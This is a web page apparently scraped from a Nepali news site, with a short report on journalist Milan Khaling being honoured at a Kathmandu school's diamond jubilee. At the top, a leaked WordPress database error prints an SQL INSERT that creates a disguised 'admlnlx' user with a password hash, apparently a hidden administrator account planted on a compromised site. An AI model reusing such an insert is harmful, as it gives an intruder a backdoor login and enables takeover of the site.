WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMbf8dWE8l1wXcuZEMJJ3MqS7NNYXY.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 01:24:45', '', 'admlnlx', 'admlnlx')
काठमाडौ । पत्रकार मिलन खालिङ सम्मानित हुनुभएको छ ।
शिबपुरी माध्यमिक विद्यालय महाराजगन्ज काठमाडौको हिरक महोत्सवका अवसरमा खालिङलाई सम्मान गरिएको हो ।
खालिङ सगै विभिन्न बिधामा सफल्ता हासिल गरेका आफ्नो पूर्व विद्यार्थीहरुलाई हिरक महोत्सवका अवसरमा उक्त बिधालयले सम्मान गरेका छन ।
सोलुखुम्बु माप्य दुधकोशी निवासी खालिङ दाक्सु मिडियाका प्रबन्ध निर्देशक हुन । विद्यालयबाट प्राप्त सम्मानले थप जिम्मेवारी थपिएको र अझ ससक्त सन्चार क्षेत्रमा लाग्ने खालिङले बताए ।